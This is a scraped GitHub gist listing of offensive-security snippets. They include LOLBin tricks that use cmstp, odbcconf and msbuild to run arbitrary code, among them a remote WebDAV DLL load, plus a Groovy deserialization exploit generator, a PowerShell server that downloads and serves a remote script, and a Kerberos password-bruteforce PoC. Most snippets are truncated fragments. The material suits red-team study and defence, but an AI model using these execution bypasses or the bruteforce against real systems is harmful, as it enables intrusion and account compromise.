Skip to content

Instantly share code, notes, and snippets.


Chris Gates carnal0wnage

View GitHub Profile
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="" ?>
View cmstp.inf
;cmstp.exe /s cmstp.inf
Arno0x / odbcconf.cs
Created Nov 22, 2017
Download and execute arbitrary code with odbcconf.exe
View odbcconf.cs
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
using System;
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
DiabloHorn /
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
DiabloHorn -
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib>
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar
DiabloHorn /
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
DiabloHorn -
cobbr / server.ps1
Last active Jan 30, 2020 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
View server.ps1
$mk = (new-object net.webclient).downloadstring("")
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.


ropnop /
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful